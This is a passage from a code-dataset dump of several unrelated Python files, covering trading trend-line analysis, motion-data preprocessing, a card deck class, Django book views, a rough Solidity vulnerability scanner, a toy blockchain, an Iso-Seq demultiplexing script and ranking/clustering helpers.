maxn_points=None, n_recalc_period=5, offset=3) -> None:\n self.last_price = None\n self.timestamp = None\n self.ohlcs: pd.DataFrame = None\n self.token = None\n self.offset = offset\n self.n_recalc_period = n_recalc_period\n self.n_since_calc = -1\n if(maxn_points):\n self.maxn_points = maxn_points\n else:\n self.maxn_points = int(getConfig('maxn_points'))\n self.psup = self.pres = None\n self.shistory = []\n self.rhistory = []\n self.cbs = set()\n self.maximas = []\n self.minimas = []\n self.maxima = None\n self.minima = None\n self.supslope = None\n self.resslope = None\n self.retracement_levels = None\n\n def subscribe(self, cb):\n self.cbs.add(cb)\n\n def calc_trendln(self):\n offset = self.offset\n if(len(self.ohlcs) < self.offset):\n offset = 0\n datapoints = self.ohlcs.iloc[-self.maxn_points:-offset]\n if(datapoints is None):\n return\n n = len(datapoints)\n acc = int(getConfig('ACCURACY'))\n try:\n mins, maxs = trendln.calc_support_resistance(\n datapoints['Close'], accuracy=acc)\n except Exception as ex:\n print('[ERROR]', ex.__str__())\n return\n\n (minimaIdxs, pmin, mintrend, minwindows), (maximaIdxs,\n pmax, maxtrend, maxwindows) = mins, maxs\n 'also shift the center to right by n'\n if(not np.nan in pmin):\n self.psup = np.poly1d([pmin[0], pmin[1]+pmin[0]*n])\n self.supslope = pmin[0]\n if(not np.nan in pmax):\n self.pres = np.poly1d([pmax[0], pmax[1]+pmax[0]*n])\n self.resslope = pmax[0]\n\n if(maximaIdxs):\n self.maximas = [(datapoints.index[x], datapoints.iloc[x]['Close'])\n for x in maximaIdxs]\n if(minimaIdxs):\n self.minimas = [(datapoints.index[x], datapoints.iloc[x]['Close'])\n for x in minimaIdxs]\n\n if(self.maximas and self.supslope):\n if(self.supslope > 0):\n 'get the last prominent maxima '\n maxid = maximaIdxs[-1]\n self.maxima = datapoints.index[maxid], datapoints.iloc[maxid]['Close']\n 'if there are maximas in close proximity, take the max'\n for r in range(maxid-3, maxid):\n if(r in maximaIdxs and datapoints.iloc[r]['Close'] > self.maxima[1]):\n self.maxima = datapoints.index[r], datapoints.iloc[r]['Close']\n maxid = r\n if(self.minimas):\n 'for minima preceeding the maxima'\n minimaIdxs2 = [x for x in minimaIdxs if x < maxid]\n minid = minimaIdxs2[-1]\n self.minima = datapoints.index[minid], datapoints.iloc[minid]['Close']\n for r in range(minid-3, minid):\n if(r in minimaIdxs2 and datapoints.iloc[r]['Close'] < self.minima[1]):\n self.minima = datapoints.index[r], datapoints.iloc[r]['Close']\n minid = r\n\n if(self.maxima and self.minima):\n 'calculate the fib retracement levels'\n fib_ratios = [0, 0.236, 0.382, 0.5, 0.618, 0.786, 1]\n self.retracement_levels = [self.maxima[1]-(\n self.maxima[1]-self.minima[1])*ratio for ratio in fib_ratios]\n\n if(self.minimas and self.resslope):\n if(self.resslope < 0):\n minid = minimaIdxs[-1]\n self.minima = datapoints.index[minid], datapoints.iloc[minid]['Close']\n for r in range(minid-3, minid):\n if(r in minimaIdxs and datapoints.iloc[r]['Close'] < self.minima[1]):\n self.minima = datapoints.index[r], datapoints.iloc[r]['Close']\n minid = r\n if(self.maximas):\n 'for minima preceeding the maxima'\n maximaIdxs2 = [x for x in maximaIdxs if x < minid]\n maxid = maximaIdxs2[-1]\n self.maxima = datapoints.index[maxid], datapoints.iloc[maxid]['Close']\n for r in range(maxid-3, maxid):\n if(r in maximaIdxs2 and datapoints.iloc[r]['Close'] < self.maxima[1]):\n self.maxima = datapoints.index[r], datapoints.iloc[r]['Close']\n maxid = r\n if(self.maxima and self.minima):\n 'calculate the fib retracement levels'\n fib_ratios = [0, 0.236, 0.382, 0.5, 0.618, 0.786, 1]\n # fib_ratios.reverse()\n # import pdb; pdb.set_trace()\n self.retracement_levels = [self.minima[1]+(\n self.maxima[1]-self.minima[1])*ratio for ratio in fib_ratios]\n\n def get_retracement_level(self):\n if(self.retracement_levels):\n return np.digitize(self.ohlcs.iloc[-1]['Close'], self.retracement_levels)\n\n def get_sr(self, offset=0):\n sup = res = None\n if(self.psup):\n sup = self.psup(offset)\n if(self.pres):\n res = self.pres(offset)\n return (sup, res)\n\n def update_supres(self):\n s, r = self.get_sr(self.n_since_calc)\n if(s):\n # self.psup = np.poly1d(\n # [self.psup.c[0], self.psup.c[1] + self.psup.c[0]*self.n_since_calc])\n # s = self.psup[0]\n self.shistory.append(\n (self.ohlcs.index[-1], dict(value=s, slope=self.psup.c[0])))\n print(datetime.datetime.time(\n self.shistory[-1][0]), 'support:', self.shistory[-1][1])\n if(r):\n # self.pres = np.poly1d(\n # [self.pres.c[0], self.pres.c[1] + self.pres.c[0]*self.n_since_calc])\n # r = self.pres(0)\n self.rhistory.append(\n (self.ohlcs.index[-1], dict(value=r, slope=self.pres.c[0])))\n print(datetime.datetime.time(\n self.rhistory[-1][0]), 'resistance:', self.rhistory[-1][1])\n\n def calc(self):\n 'min 4 sticks required'\n if(self.ohlcs is None):\n return\n length = len(self.ohlcs)\n acc = int(getConfig('ACCURACY'))\n if(length < (acc+acc/2+1)):\n return\n else:\n self.calc_trendln()\n\n def on_data(self, data):\n 'data will come on every candle update'\n self.last_price = data['last_price']\n self.timestamp = data['timestamp']\n self.ohlcs = data['ohlcs']\n self.token = data['token']\n self.n_since_calc += 1\n if(self.n_since_calc == 0):\n self.calc()\n else:\n if(self.n_since_calc >= self.n_recalc_period):\n self.calc()\n self.n_since_calc = 0\n else:\n print('n_since_calc:',\n f'{self.n_since_calc}/{self.n_recalc_period}')\n 'shift psup/res'\n self.update_supres()\n\n # for cb in self.cbs:\n # cb()\n","sub_path":"libs/calculation.py","file_name":"calculation.py","file_ext":"py","file_size_in_byte":7409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"541065290","text":"#试验一:数据在进行train,val,test之前打乱,这个文件是将全部分段,然后不是从一个数据中分train,val,test而是从所有数据中进行分割\r\nimport os\r\nimport pickle\r\nimport json\r\nimport math\r\nimport numpy as np\r\nimport random\r\n\r\n\r\nDatadir = '../../data/'\r\nout_path = '../../input/M2D_segment_frames/'\r\n\r\nmin_duration = 229\r\nmin_num = 34\r\nnum_joint = 23\r\nmax_body = 1\r\n\r\nfrom m2d_pre import pre_normalization\r\nfrom sklearn import preprocessing\r\nfrom m2d_gen import motion_feature_extract\r\nfrom sklearn.utils import shuffle\r\n\r\n# 读取这个骨架的json文件有两个问题是:是否需要旋转,去中心化;每一个json文件都有不同的帧数长度:帧数 * 23 * 3;比2sgcn网络少了人物的维度,而且帧数是不确定的。\r\n# 接受数组,产生文件\r\ndef genda(data_dirs):\r\n data = np.zeros((min_num, 3, min_duration, num_joint, max_body), dtype=np.float32)\r\n data_dir = []\r\n data_num = 0\r\n for i, one in enumerate(data_dirs):\r\n if data_num >= min_num:\r\n break\r\n\r\n data_path = os.path.join(Datadir, one)\r\n\r\n motion_features_pre = motion_feature_extract(data_path, with_centering=True, with_rotate=False)\r\n #正则化,对于每一个数据都正则化\r\n motion_features = motion_features_pre.reshape(motion_features_pre.shape[0], -1)\r\n min_max_scaler = preprocessing.MinMaxScaler().fit_transform(motion_features)\r\n motion_features = min_max_scaler.reshape(min_max_scaler.shape[0], 23, 3)\r\n\r\n t = motion_features.shape[0] // min_duration\r\n\r\n for j in range(t):\r\n if data_num >= min_num:\r\n break\r\n else:\r\n temp_features = motion_features[min_duration * j:min_duration * (j + 1), :, :]\r\n temp_features = np.expand_dims(temp_features, 3)\r\n temp_features = np.transpose(temp_features, [2, 0, 1, 3])\r\n\r\n data[data_num, :, :, :, :] = temp_features\r\n data_num += 1\r\n data_dir.append(one)\r\n\r\n data = pre_normalization(data)\r\n\r\n return data,data_dir\r\n\r\n\r\nif __name__ == '__main__':\r\n All_dirs = os.listdir(Datadir)\r\n All_dirs.sort()\r\n C_dirs = []\r\n R_dirs = []\r\n T_dirs = []\r\n W_dirs = []\r\n for one in All_dirs:\r\n if one[0] != 'D':\r\n continue\r\n if one.split('_')[1] == 'C':\r\n C_dirs.append(one)\r\n elif one.split('_')[1] == 'R':\r\n R_dirs.append(one)\r\n elif one.split('_')[1] == 'T':\r\n T_dirs.append(one)\r\n else:\r\n W_dirs.append(one)\r\n C_data,C_dir = genda(C_dirs)\r\n R_data,R_dir = genda(R_dirs)\r\n T_data,T_dir = genda(T_dirs)\r\n W_data,W_dir = genda(W_dirs)\r\n data_dir = C_dir + R_dir + T_dir + W_dir\r\n data = np.vstack((C_data, R_data, T_data, W_data))\r\n\r\n seg = min_num\r\n\r\n label = [0] * seg + [1] * seg + [2] * seg + [3] * seg\r\n data,label,data_dir = shuffle(data,label,data_dir,random_state = 0)\r\n s = len(label) // 3\r\n train,train_label,train_dir = data[:s],label[:s],data_dir[:s]\r\n val,val_label,val_dir = data[s:s*2],label[s:s*2],data_dir[s:s*2]\r\n test,test_label,test_dir = data[s*2:],label[s*2:],data_dir[s*2:]\r\n\r\n np.save('{}/{}_joint.npy'.format(out_path, 'train'), train)\r\n np.save('{}/{}_joint.npy'.format(out_path, 'val'), val)\r\n np.save('{}/{}_joint.npy'.format(out_path, 'test'), test)\r\n\r\n with open('{}/{}_label.pkl'.format(out_path, 'train'), 'wb') as f:\r\n pickle.dump((train_dir, list(train_label)), f) # 保存文件名称和对应的缩写(作为标签)形成pkl文件。\r\n with open('{}/{}_label.pkl'.format(out_path, 'val'), 'wb') as f:\r\n pickle.dump((val_dir, list(val_label)), f) # 保存文件名称和对应的缩写(作为标签)形成pkl文件。\r\n with open('{}/{}_label.pkl'.format(out_path, 'test'), 'wb') as f:\r\n pickle.dump((test_dir, list(test_label)), f) # 保存文件名称和对应的缩写(作为标签)形成pkl文件。","sub_path":"hmmr/data_gen/m2d_random.py","file_name":"m2d_random.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"35519067","text":"import random\r\n\r\nclass Deck():\r\n \"\"\"A class representing a standard deck of 52 cards.\r\n Public methods: __init__, shuffle, make_hand,\r\n show_top_card\r\n \"\"\"\r\n\r\n # Annotate object-level fields\r\n _hands: dict\r\n _stock: list\r\n\r\n def _get_card_name(self, card: int) -> str:\r\n \"\"\"Convert the card to a string representation.\"\"\"\r\n suits: list = [\"hearts\", \"clubs\", \"diamonds\", \"spades\"]\r\n ranks: list = [\"ace\", \"two\", \"three\", \"four\", \"five\", \"six\", \"seven\",\r\n \"eight\", \"nine\", \"ten\", \"jack\", \"queen\", \"king\"]\r\n return ranks[card % 13] + \" of \" + suits[card // 13]\r\n\r\n def __init__(self) -> None:\r\n \"\"\"Create a standard 52-card deck.\"\"\"\r\n self._hands = {}\r\n self._stock = list(range(51))\r\n\r\n def shuffle(self) -> None:\r\n \"\"\"Shuffle the stock.\"\"\"\r\n random.shuffle(self._stock)\r\n\r\n def make_hand(self, size: int) -> int:\r\n \"\"\"Create a hand of size cards and return a key.\"\"\"\r\n key: int = len(self._hands)\r\n hand: list = []\r\n for i in range(size):\r\n hand.append(self._stock[i])\r\n self._stock = self._stock[1:]\r\n self._hands[key] = hand\r\n return key\r\n\r\n def show_top_card(self, key: int = -1) -> str:\r\n \"\"\"Return a string representing the top card of the hand with key.\"\"\"\r\n hand: str\r\n if key != -1:\r\n hand = self._get_card_name(self._hands[key][0])\r\n else:\r\n hand = self._get_card_name(self._stock[0])\r\n return hand\r\n \r\n","sub_path":"Chapter3VideoFiles/Deck.py","file_name":"Deck.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"45207417","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http import HttpResponse\nfrom .models import *\nfrom .forms import *\n\n\ndef index(request):\n books = Book.objects.all()\n context = {'file': Book.objects.all(), 'books': books}\n return render(request, 'index.html', context)\n\n\ndef add(request):\n if request.user.is_authenticated:\n if request.user.is_superuser:\n if request.method == \"POST\":\n form = BookForm(request.POST or None, request.FILES)\n if form.is_valid():\n data = form.save(commit=False)\n data.save()\n return redirect('index')\n else:\n form = BookForm()\n\n context = {'form': form}\n return render(request, 'add.html', context)\n\n else:\n return redirect('index')\n\n return redirect('login')\n\n\ndef detail(request, id):\n book = Book.objects.get(id=id)\n return render(request, 'book_detail.html', {'book': book})\n\n\ndef edit(request, id):\n book = Book.objects.get(id=id)\n if request.method == 'POST':\n form = BookForm(request.POST or None, instance=book)\n if form.is_valid():\n data = form.save(commit=False)\n data.save()\n return redirect('detail', id)\n else:\n form = BookForm(instance=book)\n\n return render(request, 'update.html', {'book': book, 'form': form})\n\n\ndef delete(request, id):\n book = Book.objects.get(id=id)\n if request.method == 'POST':\n book.delete()\n return redirect('index')\n\n return render(request, 'delete.html', {'book': book})\n\n\ndef download(request):\n file_path = os.path.join(settings.MEDIA_ROOT, path)\n if os.path.exists(file_path):\n with open(file_path, 'rb') as fh:\n response = HttpResponse(\n fh.read(content_type='application/upload_file'))\n response['Content-Disposition'] = 'inline;filename=' + \\\n os.path.basename(file_path)\n return response\n\n raise Http404\n\n return render(request, 'book_detail.html', context)\n","sub_path":"book_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"585946634","text":"\"\"\"\n **** detect solidity source code roughly ****\n run this script to analyze source file rougthly\n see the output in logs/detectroughly.log\n and the fault source file will store in 'tempFaultSol' directory\n @ author : liuwang\n @ school : Wuhan University\n @ date : 2018.11.8\n\"\"\"\n\nimport re\nimport os\nimport shutil\nfrom Tools.utils import getDirOrFileName\nimport logging\n# config log file\n\nlogging.basicConfig(level=logging.INFO, filename='./logs/detectroughly.log',\n format = '%(asctime)s - %(levelname)s - %(message)s',\n filemode='a', datefmt='%Y-%m-%d%I:%M:%S %p')\n# print msg in console and log file\ndef doLogging(msg):\n print(msg)\n logging.info(msg)\n pass\n\nSOURCECODE_DIR = './contractdata/sourcecode'\n# SOURCECODE_DIR = './contracttest/sourcecode'\n\nOUTPUT_DIR_DoSAttack = './tempFaultSol/DoSAttack'\nOUTPUT_DIR_UexpectedEther = './tempFaultSol/UexpectedEther'\nOUTPUT_DIR_ImproperAccessControl = './tempFaultSol/ImproperAccessControl'\ndef __checkDirAndCreate(path):\n if not os.path.exists(path):\n os.makedirs(path)\n doLogging('create directory {}'.format(path))\nOUTPUT_DIRS = [OUTPUT_DIR_DoSAttack, OUTPUT_DIR_UexpectedEther, OUTPUT_DIR_ImproperAccessControl]\nfor dir in OUTPUT_DIRS:\n __checkDirAndCreate(dir)\n\n# detect call in for-loop, return 'true' if code has for loop with checked call\ndef __detectForLoapWithCall(sourceCode):\n pattern = re.compile(r'(for[ ]*?\\([^\\{]*?\\{[^\\}]*?(?:\\.transfer|(?:require|assert)\\([^\\)]*?(?:\\.send|\\.call\\..*?))\\(.*?\\})', re.S)\n faults = re.findall(pattern, sourceCode)\n for fault in faults:\n doLogging('Code here may be Error:\\n\\t' + fault)\n return len(faults) > 0\n\n# detect call in for-loop, return 'true' if code has for loop with checked call\ndef __detectUexpectedEther(sourceCode):\n pattern = re.compile(r'((?:(?:require|assert|if)\\([^\\)]*?(?:this\\.|address\\(this\\)\\.)balance[^\\)]*?[><=]{1,}[^\\)]*?\\)|'\n r'(?:require|assert|if)\\([^\\)]*?[><=]{1,}[^\\)]*?(?:this\\.|address\\(this\\)\\.)balance.*?\\)))', re.S)\n faults = re.findall(pattern, sourceCode)\n for fault in faults:\n doLogging('Code here may be Error:\\n\\t' + fault)\n return len(faults) > 0\n\ndef detectAllForLoapWithCall():\n doLogging('detectAllForLoapWithCall begin ......======================================')\n sols = getDirOrFileName(SOURCECODE_DIR)\n faultFiles = []\n print(len(sols))\n for filename in sols:\n try:\n with open(os.path.join(SOURCECODE_DIR, filename), encoding='utf-8' ) as file:\n sourcecode = file.read()\n if __detectForLoapWithCall(sourcecode):\n faultFiles.append(filename)\n doLogging(filename)\n except Exception:\n pass\n doLogging('detectAllForLoapWithCall finish !!!!!======================================')\n for filename in faultFiles:\n shutil.copyfile(os.path.join(SOURCECODE_DIR, filename),\n os.path.join(OUTPUT_DIR_DoSAttack, filename))\n return faultFiles\n\ndef detectAllUexpectedEther():\n doLogging('detectAllUexpectedEther begin ......======================================')\n sols = getDirOrFileName(SOURCECODE_DIR)\n faultFiles = []\n print(len(sols))\n for filename in sols:\n try:\n with open(os.path.join(SOURCECODE_DIR, filename), encoding='utf-8' ) as file:\n sourcecode = file.read()\n if __detectUexpectedEther(sourcecode):\n faultFiles.append(filename)\n doLogging(filename)\n except Exception:\n pass\n doLogging('detectAllUexpectedEther finish !!!!!======================================')\n for filename in faultFiles:\n shutil.copyfile(os.path.join(SOURCECODE_DIR, filename),\n os.path.join(OUTPUT_DIR_UexpectedEther, filename))\n return faultFiles\n\n\nif __name__ == '__main__':\n doLogging(detectAllForLoapWithCall())\n doLogging(detectAllUexpectedEther())","sub_path":"Tools/detectroughly.py","file_name":"detectroughly.py","file_ext":"py","file_size_in_byte":4055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"211111244","text":"import hashlib\nimport time\nimport unittest\n\nclass Block:\n\n def __init__(self, data, previous_hash = None):\n self.timestamp = self.calc_timestamp()\n self.data = data\n self.next = None\n self.previous_hash = previous_hash\n self.hash = self.calc_hash(data) + self.timestamp\n \n def calc_hash(self, input_string):\n \n sha = hashlib.sha256()\n hash_str = input_string.encode('utf-8')\n sha.update(hash_str)\n\n return sha.hexdigest()\n \n def calc_timestamp(self):\n \n \"\"\" return string representation of gmt time \"\"\"\n\n time_gmt = ''.join(str(i) for i in time.gmtime())\n return time_gmt\n \n\nclass BlockChain:\n \n def __init__(self, head=None, tail=None):\n self.head = head\n self.tail = tail\n self.previous_hash_data = None\n self.size = 0\n \n def append(self, data):\n \n #check foir valid input\n if not data:\n raise ValueError('must input data into the blockchain')\n #empty blockchain case\n if self.head is None:\n #force data to string\n data = str(data)\n self.head = Block(data)\n self.tail = self.head\n self.previous_hash_data = self.head.hash\n self.size += 1\n return\n else:\n #force data to string\n data = str(data)\n new_block = Block(data) \n new_block.previous_hash = self.previous_hash_data\n self.previous_hash_data = new_block.hash\n new_block.next = self.head\n self.head = new_block\n self.size += 1\n return\n \n \n def return_size(self):\n\n \"\"\" return the size of the blockchain \"\"\"\n\n return self.size\n \n def data_to_list(self):\n \n out = []\n block = self.head\n while block:\n out.append(block.data)\n block = block.next\n \n return out \n \n \n def to_dict(self):\n \n \"\"\" create a dictionary of the blockchain for viewing \"\"\"\n \n out = {}\n block = self.head\n while block:\n \n out[block.data] = {\n 'TimeStamp':block.timestamp,\n 'Hash':block.hash,\n 'Previous Block Hash':block.previous_hash}\n block = block.next\n return out\n\n \n \n#Instantiate the blockchain and append for testing \ntest_blockchain = BlockChain()\nblock_test_range = ['a','b','c','d']\nfor i in block_test_range:\n test_blockchain.append(i)\n \n#create dictionary for testing\ntest_blockchain_dict = test_blockchain.to_dict()\n\n\n\n\nclass TestBlockChain(unittest.TestCase):\n \n \"\"\" test blockchain suite \"\"\"\n \n def test_previous_hashing(self):\n \n \"\"\" assert hashing function works correctly \"\"\"\n \n assert (test_blockchain_dict['a']['Hash']) == \\\n (test_blockchain_dict['b']['Previous Block Hash'])\n assert (test_blockchain_dict['b']['Hash']) == \\\n (test_blockchain_dict['c']['Previous Block Hash'])\n assert (test_blockchain_dict['c']['Hash']) == \\\n (test_blockchain_dict['d']['Previous Block Hash'])\n \n def test_input_error(self):\n #chain should raise value error when no input \n with self.assertRaises(ValueError):\n test_blockchain.append('') \n \n def test_int_input(self):\n #shouldnt throw error\n test_blockchain.append(5)\n \n#run tests\nunittest.main(argv=['first-arg-is-ignored'], exit=False)","sub_path":"data_structures/BlockChain/blockchain.py","file_name":"blockchain.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"568226320","text":"#!/usr/bin/env python\n__author__ = \"etseng@pacb.com\"\n\n\"\"\"\nDemultiplex IsoSeq (SMRT Link 8.0) job output (with genome mapping)\n\"\"\"\n\nimport re\nimport sys\nfrom collections import Counter, defaultdict\nfrom csv import DictReader\nfrom pathlib import Path\nfrom typing import Dict, Optional, Set, Tuple\n\nimport typer\nfrom Bio import SeqIO\n\nfrom cupcake import version_callback\nfrom cupcake import cupcake_logger as logger\n\nmapped_id_rex = re.compile(r\"(PB.\\d+.\\d+)\")\n\n\napp = typer.Typer(name=\"cupcake.post_isoseq_cluster.demux_isoseq_with_genome\")\n\n\ndef type_fafq(fafq: str) -> str:\n x = fafq.upper()\n if x.endswith(\".FA\") or x.endswith(\".FASTA\"):\n return \"fasta\"\n elif x.endswith(\".FQ\") or x.endswith(\".FASTQ\"):\n return \"fastq\"\n else:\n raise Exception(\n f\"Mapped fasta/fastq filename must end with .fasta or .fastq! Saw {fafq} instead, abort!\"\n )\n\n\ndef link_files(src_dir: str, out_dir=Path.cwd()) -> Tuple[Path, Path, Path, Path]:\n \"\"\"\n :param src_dir: job directory\n Locate mapped.fastq, read-stat, classify report link to current directory\n \"\"\"\n\n src_dir = Path(src_dir)\n # location for mapped fastq in IsoSeq3\n mapped_fastq = src_dir.joinpath(\"outputs\", \"collapse_isoforms.fastq\") # for (int) primer --> FL count\n \"\"\"\n info = defaultdict(lambda: Counter())\n for r in DictReader(open(read_stat), delimiter=\"\\t\"):\n p = classify_info[r[\"id\"]]\n info[r[\"pbid\"]][p] += 1\n return dict(info)\n\n\ndef read_classify_csv(classify_csv: Path) -> Tuple[Set[str], Dict[str, str]]:\n \"\"\"\n :param classify_csv: classify report csv\n :return: primer list, dict of FL id --> primer\n \"\"\"\n info = {}\n primer_list = set()\n for r in DictReader(open(classify_csv), delimiter=\",\"):\n p = r[\"primer\"]\n primer_list.add(p)\n if r[\"id\"] in info:\n raise Exception(f\"{r['id']} listed more than once in {classify_csv}!\")\n info[r[\"id\"]] = p\n return primer_list, info\n\n\ndef demux_isoseq_with_genome(\n job_dir: Optional[str] = None,\n mapped_fafq: Optional[str] = None,\n read_stat: Optional[str] = None,\n classify_csv: Optional[str] = None,\n output_filename=sys.stdout,\n primer_names: Optional[str] = None,\n) -> None:\n mapped_fafq = Path(mapped_fafq)\n read_stat = Path(read_stat)\n classify_csv = Path(classify_csv)\n\n if job_dir is not None:\n _, mapped_fafq, read_stat, classify_csv = link_files(job_dir)\n else:\n for _ in (mapped_fafq, read_stat, classify_csv):\n if not _.exists():\n raise FileNotFoundError(f\"Cannot find {_.name}\")\n\n # info: dict of hq_isoform --> primer --> FL count\n logger.info(f\"Reading {classify_csv}...\")\n primer_list, classify_info = read_classify_csv(classify_csv)\n logger.info(f\"Reading {read_stat}...\")\n info = read_read_stat(read_stat, classify_info)\n\n primer_list = list(primer_list)\n primer_list.sort()\n # if primer names are not given, just use as is...\n tmp_primer_names = {x: x for x in primer_list}\n if primer_names is None:\n primer_names = tmp_primer_names\n else:\n for k, v in tmp_primer_names.items():\n if k not in primer_names:\n primer_names[k] = v\n\n with open(output_filename, \"w\") as f:\n f.write(f\"id,{','.join(list(primer_names.values()))}\\n\")\n logger.info(f\"Reading {mapped_fafq}....\")\n for r in SeqIO.parse(open(mapped_fafq), type_fafq(mapped_fafq)):\n m = mapped_id_rex.match(r.id) # expected ID: PB.X.Y|xxxx.....\n if m is None:\n raise Exception(f\"Expected ID format PB.X.Y but found {r.id}!\")\n pbid = m.group(1)\n f.write(pbid)\n for p in primer_names:\n f.write(f\",{info[pbid][p]}\")\n f.write(\"\\n\")\n logger.info(f\"Count file written to {f.name}.\")\n\n\n@app.command(name=\"\")\ndef main(\n job_dir: str = typer.Option(\n ...,\n \"--job_dir\",\n \"-j\",\n help=\"Job directory (if given, automatically finds required files)\",\n ),\n mapped_fafq: str = typer.Option(\n ..., help=\"mapped fasta/fastq (overridden by --job_dir if given)\"\n ),\n read_stat: str = typer.Option(\n ..., help=\"read_stat txt (overridden by --job_dir if given)\"\n ),\n classify_csv: str = typer.Option(\n ..., help=\"Classify report CSV (overriden by --job_dir if given)\"\n ),\n primer_names: Optional[str] = typer.Option(\n None,\n help=\"Text file showing primer sample names (default: None)\",\n ),\n output: str = typer.Option(..., \"--output\", \"-o\", help=\"Output count filename\"),\n version: bool = typer.Option(\n None,\n \"--version\",\n callback=version_callback,\n is_eager=True,\n help=\"Prints the version of the SQANTI3 package.\",\n ),\n):\n if primer_names is not None:\n primer_names = {}\n for line in open(primer_names):\n index, name = line.strip().split()\n primer_names[index] = name\n else:\n primer_names = None\n\n demux_isoseq_with_genome(\n job_dir,\n mapped_fafq,\n read_stat,\n classify_csv,\n output,\n primer_names,\n )\n\n\nif __name__ == \"__main__\":\n typer.run(main)\n","sub_path":"src/cupcake/post_isoseq_cluster/demux_isoseq_with_genome.py","file_name":"demux_isoseq_with_genome.py","file_ext":"py","file_size_in_byte":6225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"489254929","text":"import numpy as np\nimport pandas as pd\n\ndef normalizacionColumna(df, i):\n columns = df.columns.values\n df[columns[i]] = (df[columns[i]] - data[columns[i]].min()) / (df[columns[i]].max() - data[columns[i]].min())\n \ndef normalizarDataset(data, indices):\n df = data.copy()\n for i in indices:\n normalizacionColumna(df, i)\n return df\n\ndef mapearColumna(df, col):\n val = []\n for j in range(df.shape[0]):\n val.append(df[col][j])\n unicos = list(set(val))\n for j in range(df.shape[0]):\n indice = 0\n for _ in range(len(unicos)):\n if(unicos[_] == df[col][j]):\n indice = _ + 1\n break\n val[j] = indice\n return val\n\ndef mapearColumnas(data, indices):\n df = data.copy()\n columns = df.columns.values\n for i in indices:\n df[columns[i]] = mapearColumna(df, columns[i])\n return df\n\ndef normalizarfechas(data, indices, ini, fin):\n df = data.copy()\n columns = df.columns.values\n for i in indices:\n a = []\n for j in range(data.shape[0]):\n st = df[columns[i]][j][:ini]\n if(fin != 0):\n st+= df[columns[i]][j][-fin:]\n a.append(st)\n df[columns[i]] = a\n return df\n\ndef weightedAverage(data, w, l):\n df = data.copy()\n columns = df.columns.values\n wa = np.zeros(df.shape[0])\n for i in range(len(l)):\n wa += (w[i] * df[columns[l[i]]]) / sum(w)\n df['wa'] = wa\n # df = df.sort_values(by=['wa'], ascending=False)\n return df\n\ndef minimax(data, l):\n df = data.copy()\n columns = df.columns.values\n t = df.shape[0]\n mx = np.zeros(df.shape[0])\n for i in range(t):\n mx[i] = df[columns[l[0]]][i]\n for j in range(1,len(l)):\n if mx[i] > df[columns[l[j]]][i]: \n mx[i] = df[columns[l[j]]][i]\n df['maxVal'] = mx\n df = df.sort_values(by=['maxVal'], ascending=True)\n return df\n\ndef leximin(data, l):\n df = data.copy()\n columns = df.columns.values\n t = df.shape[0]\n lex = [np.zeros(df.shape[0]) for i in range(len(l))]\n a = [[] for i in range(len(l))]\n for i in range(t):\n for j in range(len(l)):\n a[j] = df[columns[l[j]]][i]\n a.sort()\n for j in range(len(l)):\n lex[j][i] = a[j]\n for j in range(len(l)):\n df['c' + str(j)] = lex[j]\n c = ['c' + str(i) for i in range(len(l))]\n df = df.sort_values(by=c, ascending=False)\n return df\n\ndef maximin(data, l):\n df = data.copy()\n columns = df.columns.values\n t = df.shape[0]\n mn = np.zeros(df.shape[0])\n for i in range(t):\n mn[i] = df[columns[l[0]]][i]\n for j in range(1,len(l)):\n if mn[i] > df[columns[l[j]]][i]: \n mn[i] = df[columns[l[j]]][i]\n df['minVal'] = mn\n df = df.sort_values(by=['minVal'], ascending=False)\n return df\n\ndef leximax(data, l):\n df = data.copy()\n columns = df.columns.values\n t = df.shape[0]\n lex = [np.zeros(df.shape[0]) for i in range(len(l))]\n a = [[] for i in range(len(l))]\n for i in range(t):\n for j in range(len(l)):\n a[j] = df[columns[l[j]]][i]\n a.sort(reverse=True)\n for j in range(len(l)):\n lex[j][i] = a[j]\n for j in range(len(l)):\n df['c' + str(j)] = lex[j]\n c = ['c' + str(i) for i in range(len(l))]\n df = df.sort_values(by=c, ascending=False)\n return df\n\ndef ParetoDomina(a,b):\n mi = len([1 for i in range(len(a)) if a[i] >= b[i]])\n my = len([1 for i in range(len(a)) if a[i] > b[i]])\n if mi == len(a):\n if my > 0:\n return True\n return False\n\ndef skylines(data, l):\n df = data.copy()\n columns = df.columns.values\n t = df.shape[0]\n for i in range(t):\n if i in df.index:\n a = [0] * len(l)\n for j in range(i + 1, t):\n if j in df.index:\n b = [0] * len(l)\n for k in range(len(l)):\n a[k] = df[columns[l[k]]][i]\n b[k] = df[columns[l[k]]][j]\n if ParetoDomina(a,b):\n df = df.drop(j)\n elif ParetoDomina(b,a):\n df = df.drop(i)\n break\n return df\n\ndef distancia_n(a, n, b, base): \n s = 0\n for i in range(n):\n s+= abs(b[i] - a[i])**base\n s = s**(1/base)\n return s\n\nimport random\ndef npoint(col, l, df):\n a = []\n for indice in l:\n a.append(random.uniform(df[col[indice]].min(),df[col[indice]].max()))\n return a\n\ndef ig(A, B):\n for a_ in A:\n for b_ in B:\n if(len(a_) != len(b_)):\n return False\n for i in range(len(a_)):\n if(a_[i] != b_[i]):\n return False\n return True\n\ndef kmeans(data, l, k, it, base):\n df = data.copy()\n t = df.shape[0]\n c = df.shape[1]\n columns = df.columns.values\n centros = []\n for i in range(k):\n centros.append(npoint(columns, l, df))\n \n G = [[] for i in range(k)]\n GANT = G\n etiqueta = [-1]*t\n iteraciones = it\n while(iteraciones > 0):\n iteraciones-=1\n for i in range(t):\n aux_ = [0]*len(l)\n for j in range(len(l)):\n aux_[j] = df[columns[l[j]]][i]\n mn = distancia_n(aux_, len(l), centros[0], 